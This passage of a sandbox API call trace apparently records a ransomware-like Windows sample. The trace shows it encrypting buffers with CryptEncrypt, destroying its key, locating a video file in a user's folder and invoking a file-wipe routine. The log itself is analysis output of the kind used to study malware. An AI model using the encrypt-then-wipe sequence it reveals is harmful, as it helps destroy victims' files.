hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.276] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xf447, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xf450) returned 1 [0042.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.276] CharLowerBuffW (in: lpsz="byte[62545]", cchLength=0xb | out: lpsz="byte[62545]") returned 0xb [0042.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.277] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.277] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.278] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x944458*, pdwDataLen=0x6ae220*=0xf447, dwBufLen=0xf450 | out: pbData=0x944458*, pdwDataLen=0x6ae220*=0xf450) returned 1 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.278] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.279] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.279] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.287] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.287] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.287] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.287] CryptDestroyKey (hKey=0x7c2200) returned 1 [0042.287] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.287] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.287] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.288] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.288] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.288] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.288] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.288] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0042.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.288] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.289] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.289] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.289] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.289] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.289] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.290] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.290] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0042.290] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.290] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.291] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.291] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0042.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x2ecab3d0, ftLastWriteTime.dwHighDateTime=0x1d5c47d, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0x7c2240 [0042.292] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.292] CharLowerBuffW (in: lpsz="byte[62535]", cchLength=0xb | out: lpsz="byte[62535]") returned 0xb [0042.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.292] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.292] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.293] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.293] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.293] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.293] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.293] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.294] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] 